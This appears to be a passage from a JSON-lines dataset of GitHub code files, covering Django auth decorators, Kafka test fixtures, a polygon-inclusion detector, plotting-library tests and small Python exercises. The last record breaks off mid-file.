+{"seq_id":"74819682244","text":"# _*_coding:utf-8_*_\r\nimport re\r\n\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\n\r\nfrom common.cache_helper import get_mc\r\nfrom conf.memcachedconf import TOKEN_PREFIX\r\nfrom conf.sessionconf import SESSION_LOGIN\r\n\r\n\r\n__author__ = 'Administrator'\r\n\r\n\r\ndef login_required(func):\r\n \"\"\"\r\n 登录装饰器,用于判断是否登录\r\n :param func:\r\n :return:\r\n \"\"\"\r\n\r\n def wrap(request, **kwargs):\r\n ilog = SESSION_LOGIN in request.session\r\n if ilog:\r\n return func(request, **kwargs)\r\n else:\r\n # 登录成功后重定向到请求的URI\r\n rori = request.META.get('REQUEST_URI', '/freezer/')\r\n return HttpResponseRedirect('/freezer/login?uri=' + rori)\r\n\r\n return wrap\r\n\r\n\r\ndef token_required(func):\r\n \"\"\"\r\n api token值判断\r\n :param func:\r\n :return:\r\n \"\"\"\r\n\r\n def wrap(request, **kwargs):\r\n token = request.REQUEST.get(\"token\", None)\r\n response = HttpResponse()\r\n if token:\r\n # 检查token值是否过期\r\n if re.match(\"^\" + TOKEN_PREFIX + \"[0-9\\-a-zA-Z]+$\", token):\r\n mc = get_mc()\r\n val = mc.get(str(token))\r\n if val:\r\n # 对网页进行处理(后期要根据token值进行权限控制)\r\n # request.REQUEST[\"username\"] = val\r\n return func(request, val, **kwargs)\r\n # return func(request, **kwargs)\r\n else:\r\n response.status_code = 401\r\n response.reason_phrase = \"token timeout\"\r\n else:\r\n response.status_code = 401\r\n response.reason_phrase = \"invalid token\"\r\n else:\r\n # 说明没有传递token值过来\r\n response.status_code = 401\r\n response.reason_phrase = \"unauthorized\"\r\n return response\r\n\r\n return wrap","repo_name":"cherrishes/weilai","sub_path":"xingxing/util/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"29361185837","text":"studentScore = {'Alice': 99, \"Bob\": 97, \"Carol\": 96, \"Dave\": 100}\r\n\r\n\r\ndef sortNameSequence(studentScore):\r\n for name, score in sorted(studentScore.items()):\r\n print(\"%s,%s\" % (name, score))\r\n\r\n\r\ndef sortNameInverse(studentScore):\r\n for name, score in sorted(studentScore.items(), reverse=True):\r\n print(\"%s,%s\" % (name, score))\r\n\r\n\r\ndef sortScoreSequence(studentScore):\r\n studentScore2 = {(score, name): score for name, score in studentScore.items()}\r\n for (score, name), score in sorted(studentScore2.items()):\r\n print(\"%s,%s\" % (name, score))\r\n\r\n\r\ndef sortScoreInverse(studentScore):\r\n studentScore2 = {(score, name): score for name, score in studentScore.items()}\r\n for (score, name), score in sorted(studentScore2.items(), reverse=True):\r\n print(\"%s,%s\" % (name, score))\r\n\r\n\r\noperationInformation = \"\"\"\r\n1. Sort by name in lexicographical order.\r\n2. Sort by name in reverse lexicographical order.\r\n3. Sort by score from small to large.\r\n4. Sort by score from large to small.\r\nq. 
Quit the program.\r\n\"\"\"\r\n\r\nwhile True:\r\n opt = input(operationInformation)\r\n if opt == \"1\":\r\n sortNameSequence(studentScore)\r\n elif opt == \"2\":\r\n sortNameInverse(studentScore)\r\n elif opt == \"3\":\r\n sortScoreSequence(studentScore)\r\n elif opt == \"4\":\r\n sortScoreInverse(studentScore)\r\n elif opt.lower() == \"q\":\r\n print(\"Sayonara\")\r\n break\r\n else:\r\n print(\"Invalid command\")\r\n","repo_name":"krydom/Tsinghua_Programming_Homework","sub_path":"Python Programming/week2/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"36577293822","text":"from __future__ import absolute_import\n\nimport atexit\nimport logging\nimport os\nimport os.path\nimport shutil\nimport subprocess\nimport tempfile\nimport time\nimport uuid\n\nfrom six.moves import urllib\nfrom six.moves.urllib.parse import urlparse # pylint: disable=E0611,F0401\n\nfrom test.service import ExternalService, SpawnedService\nfrom test.testutil import get_open_port\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Fixture(object):\n kafka_version = os.environ.get('KAFKA_VERSION', '0.8.0')\n scala_version = os.environ.get(\"SCALA_VERSION\", '2.8.0')\n project_root = os.environ.get('PROJECT_ROOT', os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\n kafka_root = os.environ.get(\"KAFKA_ROOT\", os.path.join(project_root, 'servers', kafka_version, \"kafka-bin\"))\n ivy_root = os.environ.get('IVY_ROOT', os.path.expanduser(\"~/.ivy2/cache\"))\n\n @classmethod\n def download_official_distribution(cls,\n kafka_version=None,\n scala_version=None,\n output_dir=None):\n if not kafka_version:\n kafka_version = cls.kafka_version\n if not scala_version:\n scala_version = cls.scala_version\n if not output_dir:\n output_dir = os.path.join(cls.project_root, 'servers', 'dist')\n\n distfile = 'kafka_%s-%s' % (scala_version, kafka_version,)\n url_base = 'https://archive.apache.org/dist/kafka/%s/' % (kafka_version,)\n output_file = os.path.join(output_dir, distfile + '.tgz')\n\n if os.path.isfile(output_file):\n log.info(\"Found file already on disk: %s\", output_file)\n return output_file\n\n # New tarballs are .tgz, older ones are sometimes .tar.gz\n try:\n url = url_base + distfile + '.tgz'\n log.info(\"Attempting to download %s\", url)\n response = urllib.request.urlopen(url)\n except urllib.error.HTTPError:\n log.exception(\"HTTP Error\")\n url = url_base + distfile + '.tar.gz'\n log.info(\"Attempting to download %s\", url)\n response = urllib.request.urlopen(url)\n\n log.info(\"Saving distribution file to %s\", output_file)\n with open(output_file, 'w') as output_file_fd:\n output_file_fd.write(response.read())\n\n return output_file\n\n @classmethod\n def test_resource(cls, filename):\n return os.path.join(cls.project_root, \"servers\", cls.kafka_version, \"resources\", filename)\n\n @classmethod\n def kafka_run_class_args(cls, *args):\n result = [os.path.join(cls.kafka_root, 'bin', 'kafka-run-class.sh')]\n result.extend(args)\n return result\n\n def kafka_run_class_env(self):\n env = os.environ.copy()\n env['KAFKA_LOG4J_OPTS'] = \"-Dlog4j.configuration=file:%s\" % self.test_resource(\"log4j.properties\")\n return env\n\n @classmethod\n def render_template(cls, source_file, target_file, binding):\n log.info('Rendering %s from template %s', target_file, source_file)\n with open(source_file, \"r\") as handle:\n template = handle.read()\n assert len(template) > 0, 'Empty 
template %s' % source_file\n with open(target_file, \"w\") as handle:\n handle.write(template.format(**binding))\n handle.flush()\n os.fsync(handle)\n\n # fsync directory for durability\n # https://blog.gocept.com/2013/07/15/reliable-file-updates-with-python/\n dirfd = os.open(os.path.dirname(target_file), os.O_DIRECTORY)\n os.fsync(dirfd)\n os.close(dirfd)\n\n\nclass ZookeeperFixture(Fixture):\n @classmethod\n def instance(cls):\n if \"ZOOKEEPER_URI\" in os.environ:\n parse = urlparse(os.environ[\"ZOOKEEPER_URI\"])\n (host, port) = (parse.hostname, parse.port)\n fixture = ExternalService(host, port)\n else:\n (host, port) = (\"127.0.0.1\", None)\n fixture = cls(host, port)\n\n fixture.open()\n return fixture\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n\n self.tmp_dir = None\n self.child = None\n\n def kafka_run_class_env(self):\n env = super(ZookeeperFixture, self).kafka_run_class_env()\n env['LOG_DIR'] = os.path.join(self.tmp_dir, 'logs')\n return env\n\n def out(self, message):\n log.info(\"*** Zookeeper [%s:%s]: %s\", self.host, self.port or '(auto)', message)\n\n def open(self):\n self.tmp_dir = tempfile.mkdtemp()\n self.out(\"Running local instance...\")\n log.info(\" host = %s\", self.host)\n log.info(\" port = %s\", self.port or '(auto)')\n log.info(\" tmp_dir = %s\", self.tmp_dir)\n\n # Configure Zookeeper child process\n template = self.test_resource(\"zookeeper.properties\")\n properties = os.path.join(self.tmp_dir, \"zookeeper.properties\")\n args = self.kafka_run_class_args(\"org.apache.zookeeper.server.quorum.QuorumPeerMain\", properties)\n env = self.kafka_run_class_env()\n\n # Party!\n timeout = 5\n max_timeout = 30\n backoff = 1\n end_at = time.time() + max_timeout\n tries = 1\n auto_port = (self.port is None)\n while time.time() < end_at:\n if auto_port:\n self.port = get_open_port()\n self.out('Attempting to start on port %d (try #%d)' % (self.port, tries))\n self.render_template(template, properties, vars(self))\n self.child = SpawnedService(args, env)\n self.child.start()\n timeout = min(timeout, max(end_at - time.time(), 0))\n if self.child.wait_for(r\"binding to port\", timeout=timeout):\n break\n self.child.dump_logs()\n self.child.stop()\n timeout *= 2\n time.sleep(backoff)\n tries += 1\n else:\n raise Exception('Failed to start Zookeeper before max_timeout')\n self.out(\"Done!\")\n atexit.register(self.close)\n\n def close(self):\n if self.child is None:\n return\n self.out(\"Stopping...\")\n self.child.stop()\n self.child = None\n self.out(\"Done!\")\n shutil.rmtree(self.tmp_dir)\n\n def __del__(self):\n self.close()\n\n\nclass KafkaFixture(Fixture):\n @classmethod\n def instance(cls, broker_id, zk_host, zk_port, zk_chroot=None,\n host=None, port=None,\n transport='PLAINTEXT', replicas=1, partitions=2):\n if zk_chroot is None:\n zk_chroot = \"kafka-python_\" + str(uuid.uuid4()).replace(\"-\", \"_\")\n if \"KAFKA_URI\" in os.environ:\n parse = urlparse(os.environ[\"KAFKA_URI\"])\n (host, port) = (parse.hostname, parse.port)\n fixture = ExternalService(host, port)\n else:\n # force IPv6 here because of a confusing point:\n #\n # - if the string \"localhost\" is passed, Kafka will *only* bind to the IPv4 address of localhost\n # (127.0.0.1); however, kafka-python will attempt to connect on ::1 and fail\n #\n # - if the address literal 127.0.0.1 is passed, the metadata request during bootstrap will return\n # the name \"localhost\" and we'll go back to the first case. 
This is odd!\n #\n # Ideally, Kafka would bind to all loopback addresses when we tell it to listen on \"localhost\" the\n # way it makes an IPv6 socket bound to both 0.0.0.0/0 and ::/0 when we tell it to bind to \"\" (that is\n # to say, when we make a listener of PLAINTEXT://:port.\n #\n # Note that even though we specify the bind host in bracket notation, Kafka responds to the bootstrap\n # metadata request without square brackets later.\n if host is None:\n host = \"[::1]\"\n fixture = KafkaFixture(host, port, broker_id,\n zk_host, zk_port, zk_chroot,\n transport=transport,\n replicas=replicas, partitions=partitions)\n fixture.open()\n return fixture\n\n def __init__(self, host, port, broker_id, zk_host, zk_port, zk_chroot,\n replicas=1, partitions=2, transport='PLAINTEXT'):\n self.host = host\n self.port = port\n\n self.broker_id = broker_id\n self.transport = transport.upper()\n self.ssl_dir = self.test_resource('ssl')\n\n self.zk_host = zk_host\n self.zk_port = zk_port\n self.zk_chroot = zk_chroot\n\n self.replicas = replicas\n self.partitions = partitions\n\n self.tmp_dir = None\n self.child = None\n self.running = False\n\n def kafka_run_class_env(self):\n env = super(KafkaFixture, self).kafka_run_class_env()\n env['LOG_DIR'] = os.path.join(self.tmp_dir, 'logs')\n return env\n\n def out(self, message):\n log.info(\"*** Kafka [%s:%s]: %s\", self.host, self.port or '(auto)', message)\n\n def open(self):\n if self.running:\n self.out(\"Instance already running\")\n return\n\n self.tmp_dir = tempfile.mkdtemp()\n self.out(\"Running local instance...\")\n log.info(\" host = %s\", self.host)\n log.info(\" port = %s\", self.port or '(auto)')\n log.info(\" transport = %s\", self.transport)\n log.info(\" broker_id = %s\", self.broker_id)\n log.info(\" zk_host = %s\", self.zk_host)\n log.info(\" zk_port = %s\", self.zk_port)\n log.info(\" zk_chroot = %s\", self.zk_chroot)\n log.info(\" replicas = %s\", self.replicas)\n log.info(\" partitions = %s\", self.partitions)\n log.info(\" tmp_dir = %s\", self.tmp_dir)\n\n # Create directories\n os.mkdir(os.path.join(self.tmp_dir, \"logs\"))\n os.mkdir(os.path.join(self.tmp_dir, \"data\"))\n\n self.out(\"Creating Zookeeper chroot node...\")\n args = self.kafka_run_class_args(\"org.apache.zookeeper.ZooKeeperMain\",\n \"-server\", \"%s:%d\" % (self.zk_host, self.zk_port),\n \"create\",\n \"/%s\" % self.zk_chroot,\n \"kafka-python\")\n env = self.kafka_run_class_env()\n proc = subprocess.Popen(args, env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n if proc.wait() != 0:\n self.out(\"Failed to create Zookeeper chroot node\")\n self.out(proc.stdout.read())\n self.out(proc.stderr.read())\n raise RuntimeError(\"Failed to create Zookeeper chroot node\")\n self.out(\"Done!\")\n\n # Configure Kafka child process\n properties = os.path.join(self.tmp_dir, \"kafka.properties\")\n template = self.test_resource(\"kafka.properties\")\n args = self.kafka_run_class_args(\"kafka.Kafka\", properties)\n env = self.kafka_run_class_env()\n\n timeout = 5\n max_timeout = 30\n backoff = 1\n end_at = time.time() + max_timeout\n tries = 1\n auto_port = (self.port is None)\n while time.time() < end_at:\n # We have had problems with port conflicts on travis\n # so we will try a different port on each retry\n # unless the fixture was passed a specific port\n if auto_port:\n self.port = get_open_port()\n self.out('Attempting to start on port %d (try #%d)' % (self.port, tries))\n self.render_template(template, properties, vars(self))\n self.child = SpawnedService(args, 
env)\n self.child.start()\n timeout = min(timeout, max(end_at - time.time(), 0))\n if self.child.wait_for(r\"\\[Kafka Server %d\\], Started\" %\n self.broker_id, timeout=timeout):\n break\n self.child.dump_logs()\n self.child.stop()\n timeout *= 2\n time.sleep(backoff)\n tries += 1\n else:\n raise Exception('Failed to start KafkaInstance before max_timeout')\n self.out(\"Done!\")\n self.running = True\n atexit.register(self.close)\n\n def __del__(self):\n self.close()\n\n def close(self):\n if not self.running:\n self.out(\"Instance already stopped\")\n return\n\n self.out(\"Stopping...\")\n self.child.stop()\n self.child = None\n self.out(\"Done!\")\n shutil.rmtree(self.tmp_dir)\n self.running = False\n","repo_name":"openstack-archive/deb-python-kafka","sub_path":"test/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":12623,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"99"} +{"seq_id":"34742474388","text":"N = int(input())\n\nnums = list(map(int, input().split()))\ncount = 0\ndef eratosthenes(num: int) -> bool: # 함수이름은 그냥 임시로 지은거임..\n for i in range(2, num-1):\n if num % i == 0:\n return False\n return True\n\nfor n in nums:\n if n == 1:\n continue\n if n == 2:\n count += 1\n continue\n\n if eratosthenes(n):\n count += 1\n else:\n continue\n\n\nprint(count)","repo_name":"artists2/Algorithm","sub_path":"baekjoon/1978.py","file_name":"1978.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38919818432","text":"import logging\nimport sys\nimport feedparser\n\n# ログの設定\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n# StreamHandlerの設定\nhandler = logging.StreamHandler(stream=sys.stdout)\nhandler.setLevel(logging.INFO)\n\n# ハンドラをロガーに追加\nlogger.addHandler(handler)\n\ndef get_all_entries(url):\n all_entries = []\n logger.info(f\"Fetching all entries from feed: {url}\")\n url = f\"{url}?all=1\"\n feed = feedparser.parse(url)\n entries = feed.entries\n if not entries:\n logger.info(f\"No more entries found. 
Exiting.\")\n else:\n for entry in entries:\n # 各エントリからcontentとlinkを抽出し、辞書に格納\n all_entries.append({'content': entry.summary, 'link': entry.link})\n\n return all_entries\n\ndef get_system_role_for_extracting_image_url():\n return \"\"","repo_name":"noriyukitakei/blog-tips-generator","sub_path":"entry_processor_zenn.py","file_name":"entry_processor_zenn.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"21159870798","text":"#!/usr/bin/env python3\n\"\"\"\nfichier principal pour la detection des inclusions.\nce fichier est utilise pour les tests automatiques.\nattention donc lors des modifications.\n\"\"\"\nimport sys\nfrom tycat import read_instance\nfrom tycat import tycat\nfrom geo.point import Point\nfrom geo.polygon import Polygon\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\ndef air_poly_liste(polygones):\n \"\"\"\n Renvoie une liste de triplet (indice, polygones, air du polygone)\n \"\"\"\n return [[i, abs(polygones[i].area())] for i in range(len(polygones))]\n\ndef point_intersection(point, segment):\n \"\"\"\n Vérifie si la semi-droite verticale tracée vers le haut\n à partir du point intersecte le segment\n \"\"\"\n x_point = point.coordinates[0]\n x1, x2 = segment.endpoints[0].coordinates[0], segment.endpoints[1].coordinates[0]\n if segment.is_vertical() or x_point < min(x1, x2) or x_point >= max(x1, x2):\n return False\n\n if segment.endpoints[0].coordinates[1] < point.coordinates[1] and segment.endpoints[1].coordinates[1] < point.coordinates[1]:\n return True\n\n coeff, oao = segment.eq_droite()\n y_inter = coeff*x_point + oao\n if point.coordinates[1] > y_inter:\n return True\n return False\n\n\ndef point_dans_polygone(point, polygone):\n \"\"\"\n utilise l'algorithme du raycast fourni avec amélioration pour savoir si un point est dans un polygone\n \"\"\"\n count = 0 # Compteur du nombre de segments traversés\n\n for segment in polygone.segments():\n\n if point_intersection(point, segment):\n count += 1\n return bool(count%2) #on renvoie True si le nombre est impair, False si il est pair\n\n\ndef taille_diagonale_quadrant(quadrant):\n \"\"\"\n renvoie la taille de la diagonale d'une quadrant\n \"\"\"\n point_mini = Point(quadrant.min_coordinates)\n point_maxi = Point(quadrant.max_coordinates)\n return point_mini.distance_to(point_maxi)\n\ndef poly_indice_quadrant_diagonale(polygone, i):\n \"\"\"\n Renvoie le couple quadrant et diagonale de quadrant\n \"\"\"\n rectangle = polygone.bounding_quadrant()\n return [polygone, i, rectangle, taille_diagonale_quadrant(rectangle)]\n\n\ndef trouve_inclusions_naif(polygones):\n longueur = len(polygones)\n liste_resultat = [-1]*longueur\n for i in range(longueur): # On parcours tout les polygones\n polygones_sup = [] # Liste pour stocker tout les polygones dans le quel le ième polygone est inclus\n point_test = polygones[i].points[0] # On choisit un point test\n for j in range(longueur): # On parcourt tout les polygones\n if j != i: # sauf le ième pour verifier si ils contiennent ce dernier\n if point_dans_polygone(point_test, polygones[j]):\n polygones_sup += [j]\n if polygones_sup != []:\n # Détermine le polygone avec l'air la plus petite\n min_air, i_petit_poly = abs(polygones[polygones_sup[0]].area()), polygones_sup[0]\n for indice_poly in polygones_sup[1:]:\n air_poly = abs(polygones[indice_poly].area())\n if air_poly <= min_air:\n min_air, i_petit_poly = air_poly, indice_poly\n liste_resultat[i] = 
i_petit_poly # On stock l'indice du plus petit polygone dans les résultats\n return liste_resultat\n\n\ndef trouve_inclusions_air_quadrant(polygones):\n nb_polygones = len(polygones)\n liste_resultat = [-1]*nb_polygones\n #on trie les polygones par aire. En renvoyant la liste des triplet\n air_liste = sorted(air_poly_liste(polygones), key = lambda triplet: triplet[1])\n quadrant_liste = [poly.bounding_quadrant() for poly in polygones]\n for i in range(nb_polygones - 1, -1, -1): #on parcourt chacun des polygones\n point_test = polygones[air_liste[i][0]].points[0] #on choisit un point test\n for j in range(i+1, nb_polygones): #pour tous les polygones ayant une aire supérieure\n # On vérifie si les aires ne sont pas égales\n if air_liste[i][1] < air_liste[j][1]:\n # On vérifie déjà si les quadrants s'intersectent\n if quadrant_liste[air_liste[i][0]].intersect(quadrant_liste[air_liste[j][0]]):\n # On vérifie si le point est dans le polygone\n if point_dans_polygone(point_test, polygones[air_liste[j][0]]):\n liste_resultat[air_liste[i][0]] = air_liste[j][0] # On ajoute l'indice du polygone a la liste résultat\n break\n\n return liste_resultat\n\ndef trouve_inclusions_quadrant(polygones):\n nb_polygones = len(polygones)\n liste_resultat = [-1] * nb_polygones\n polygones_caracteristiques = [poly_indice_quadrant_diagonale(polygones[i], i) for i in range(nb_polygones)]\n polygones_caracteristiques.sort(key=lambda polygone_cara : polygone_cara[3])\n #desormais tries\n for i in range(nb_polygones -1):\n point_test = polygones_caracteristiques[i][0].points[0] #premier point du polygone\n\n for j in range(i + 1, nb_polygones):\n if polygones_caracteristiques[i][2].intersect(polygones_caracteristiques[j][2]):\n if polygones_caracteristiques[i][3] < polygones_caracteristiques[j][3]:\n if point_dans_polygone(point_test, polygones_caracteristiques[j][0]):\n liste_resultat[polygones_caracteristiques[i][1]] = polygones_caracteristiques[j][1]\n break\n\n return liste_resultat\n\n\ndef intersection_ligne(x_ligne, segment):\n \"\"\"\n Retourne l'ordonnée du point d'intersection s'il y a intersection\n \"\"\"\n coeff, oao = segment.eq_droite()\n y_inter = coeff*x_ligne + oao\n return y_inter\n\ndef orientation(segment):\n if segment.endpoints[0].coordinates[0] < segment.endpoints[1].coordinates[0]:\n return 1\n else:\n return -1\n\ndef polygones_quadrant(polygones):\n return [[polygone, polygone.bounding_quadrant()] for polygone in polygones]\n\n\ndef liste_intersection(x_ligne, polygones):\n \"\"\"\n Retourne la liste des couples (y_intersection, indice_poly, Bool_ajout)\n \"\"\"\n liste_intersec = []\n for i, (polygone, quadrant) in enumerate(polygones):\n if x_ligne < quadrant.min_coordinates[0] or x_ligne > quadrant.max_coordinates[0]:\n continue\n orientation_prec = 0\n for segment in polygone.segments():\n x1, x2 = segment.endpoints[0].coordinates[0], segment.endpoints[1].coordinates[0]\n if segment.is_vertical() or min(x1, x2) > x_ligne or max(x1, x2) < x_ligne:\n continue\n y0, y1 = segment.endpoints[0].coordinates[1], segment.endpoints[1].coordinates[1]\n if x_ligne == segment.endpoints[0].coordinates[0]:\n orientation_actuelle = orientation(segment)\n if orientation_prec == 0:\n orientation_prec = orientation_actuelle\n elif orientation_prec == -1:\n if orientation_actuelle == -1:\n liste_intersec += [[y0, i, True]]\n else:\n liste_intersec += [[y0, i, False]]\n orientation_prec = 0\n else:\n if orientation_actuelle == -1:\n liste_intersec += [[y0, i, False]]\n else:\n liste_intersec += [[y0, i, 
True]]\n orientation_prec = 0\n elif x_ligne == segment.endpoints[1].coordinates[0]:\n orientation_actuelle = orientation(segment)\n if orientation_prec == 0:\n orientation_prec = orientation_actuelle\n elif orientation_prec == -1:\n if orientation_actuelle == -1:\n liste_intersec += [[y1, i, True]]\n else:\n liste_intersec += [[y1, i, False]]\n orientation_prec = 0\n else:\n if orientation_actuelle == -1:\n liste_intersec += [[y1, i, False]]\n else:\n liste_intersec += [[y1, i, True]]\n orientation_prec = 0\n else:\n liste_intersec += [[intersection_ligne(x_ligne, segment), i, True]]\n return liste_intersec\n\n\ndef trouve_inclusions_ligne(polygones):\n nb_polygones = len(polygones)\n poly_croise = [False]*nb_polygones\n liste_resultat = [-1]*nb_polygones\n polygone_quadrant = polygones_quadrant(polygones)\n j = 0\n while j < nb_polygones and not(poly_croise[j]):\n liste_intersec = sorted(liste_intersection(polygones[j].points[0].coordinates[0], polygone_quadrant), key = lambda triplet: triplet[0])\n liste_eponge = []\n for y_intersec, i, ajout in liste_intersec:\n if liste_eponge == []:\n poly_croise[i] = True\n if ajout:\n liste_eponge.append(i)\n else:\n if i == liste_eponge[-1]:\n if ajout:\n liste_eponge.pop()\n else:\n liste_resultat[i] = liste_eponge[-1]\n poly_croise[i] = True\n if ajout:\n liste_eponge.append(i)\n j += 1\n while j < nb_polygones and poly_croise[j]:\n j += 1\n return liste_resultat\n\n\n\ndef tests_temps(function):\n \"\"\"\n Renvoie les temps selon le nombre de polygones\n \"\"\"\n nb_polygones = [500, 1000, 1500, 2000, 2500, 3000, 3500, 4000,\\\n 10000, 20000, 30000, 40000]\n temps = []\n for nb in nb_polygones:\n fichier = \"tests/polygons/\" + sys.argv[1] + \"-\" + str(nb) + \".poly\"\n polygones = read_instance(fichier)\n start_time = time.time()\n function(polygones)\n temps += [time.time() - start_time]\n return(nb_polygones, temps)\n\n\ndef tests_temps_csv():\n \"\"\"\n Renvoie les temps en les cherchant dans le .csv\n \"\"\"\n fname = sys.argv[1]\n file = open(fname, \"r\")\n temps = []\n nb_polygones = []\n reader = csv.reader(file)\n next(reader)\n for ligne in reader:\n valeur = ligne[0].split('-')[1]\n nb, ok, tmps = valeur.split(';')\n nb_polygones.append(int(nb))\n temps.append(float(tmps))\n file.close()\n return (nb_polygones, temps)\n\n\ndef trace_graphique():\n x, y1 = tests_temps_csv()\n # y2 = tests_temps(trouve_inclusions_naif)[1]\n # y3 = tests_temps(trouve_inclusion_test)[1]\n plt.plot(x, y1, label=\"avec aires\")\n # plt.plot(x, y2, label=\"Naif\")\n # plt.plot(x, y3, label=\"sans aires\")\n plt.title(\"Mesure de performances\")\n plt.xlabel(\"Nombre de polygones\")\n plt.ylabel(\"Temps\")\n plt.legend()\n plt.show()\n\n\ndef main():\n \"\"\"\n charge chaque fichier .poly donne\n trouve les inclusions\n affiche l'arbre en format texte\n \"\"\"\n # trace_graphique()\n for fichier in sys.argv[1:]:\n polygones = read_instance(fichier)\n # inclusions = trouve_inclusions_ligne(polygones)\n tycat(polygones)\n # print(inclusions)\n # for fichier in sys.argv[1:]:\n # polygones = read_instance(fichier)\n # start_time = time.time()\n # inclusions_bis = trouve_inclusions_bis(polygones)\n # temps_bis = time.time() - start_time\n # print(\"Résultats algo bis:\", inclusions_bis)\n # print(\"Temps algo bis:\", temps_bis)\n # start_time = time.time()\n # inclusions = trouve_inclusions_quadrant(polygones)\n # temps = time.time() - start_time\n # print(\"Résultats algo normal:\", inclusions)\n # print(\"Temps algo normal:\", temps)\n\n\nif __name__ == 
\"__main__\":\n main()\n","repo_name":"AndriyParkho/polygone_included","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11889,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10699448092","text":"from numpy.core import numeric\nimport pytest\nimport pandas as pd\n\nfrom shmapy.hex_shmap import us_plot_hex\n\nstates_to_test = [\"CA\", \"MD\", \"PA\", \"TX\"]\n\n\n@pytest.mark.parametrize(\n \"filename,chart_type,show_figure\",\n [\n (\"tests/data/demo_input1.csv\", \"vbar\", False),\n (\"tests/data/demo_input2.csv\", \"choropleth\", False),\n (\"tests/data/demo_input3.csv\", \"vbar\", False),\n (\"tests/data/demo_input4.csv\", \"vbar\", False),\n (\"tests/data/demo_input5.csv\", \"categorical\", False),\n (\"tests/data/demo_input6.csv\", \"choropleth\", False),\n ],\n)\ndef test_hex_shmap_default(filename, chart_type, show_figure):\n us_plot_hex(filename, chart_type=chart_type, show_figure=show_figure)\n assert 1 == 1\n\n\n@pytest.mark.parametrize(\n \"filename,numeric_labels,numeric_labels_custom\",\n [\n (\"tests/data/demo_input1.csv\", \"all\", None),\n (\"tests/data/demo_input2.csv\", states_to_test, None),\n (\"tests/data/demo_input4.csv\", None, \"fruit\"),\n ],\n)\ndef test_hex_vbar_custom(filename, numeric_labels, numeric_labels_custom):\n us_plot_hex(\n filename,\n chart_type=\"vbar\",\n numeric_labels=numeric_labels,\n numeric_labels_custom=numeric_labels_custom,\n show_figure=False,\n )\n assert 1 == 1\n\n\n@pytest.mark.parametrize(\n \"filename,numeric_labels,numeric_labels_custom\",\n [\n (\"tests/data/demo_input1.csv\", \"all\", None),\n (\"tests/data/demo_input2.csv\", states_to_test, None),\n (\"tests/data/demo_input4.csv\", None, \"fruit\"),\n ],\n)\ndef test_hex_choropleth_custom(filename, numeric_labels, numeric_labels_custom):\n us_plot_hex(\n filename,\n chart_type=\"choropleth\",\n numeric_labels=numeric_labels,\n numeric_labels_custom=numeric_labels_custom,\n show_figure=False,\n )\n assert 1 == 1\n\n\n@pytest.mark.parametrize(\n \"filename,fill_color,category_labels\",\n [\n (\n \"tests/data/demo_input5.csv\",\n [\"#ef476f\", \"#ffd166\", \"#06d6a0\", \"#118ab2\", \"black\",],\n None,\n ),\n (\n \"tests/data/demo_input5.csv\",\n [\"#ef476f\", \"#ffd166\", \"#06d6a0\", \"#118ab2\", \"black\",],\n [\"Apple\", \"Banana\", \"Cherry\", \"Durian\", \"Elderberry\"],\n ),\n ],\n)\ndef test_hex_categorical_custom(filename, fill_color, category_labels):\n us_plot_hex(\n filename,\n chart_type=\"categorical\",\n fill_color=fill_color,\n category_labels=category_labels,\n show_figure=False,\n )\n assert 1 == 1\n","repo_name":"mpkrass7/shmapy","sub_path":"tests/test_hex_shmap.py","file_name":"test_hex_shmap.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"99"} +{"seq_id":"72083482566","text":"import turtle\n\ns = turtle.Screen()\nt = turtle.Turtle()\n\nfor x in range(4):\n t.fd(100)\n t.rt(90)\n\n\nt.speed(10)\nx = 200\nwhile x >= 10:\n t.circle(x)\n x = x-10\n\n\n\nturtle.done()\n","repo_name":"egiam/Programming-and-Learning","sub_path":"Python/Curso de Udemy python/9.6 TurtleAuto.py","file_name":"9.6 TurtleAuto.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33580843644","text":"from GeneralGraph import GeneralGraph as gg\nfrom Gliffs import gliffs as gliffs\nimport json\nimport csv\n\n\ndef 
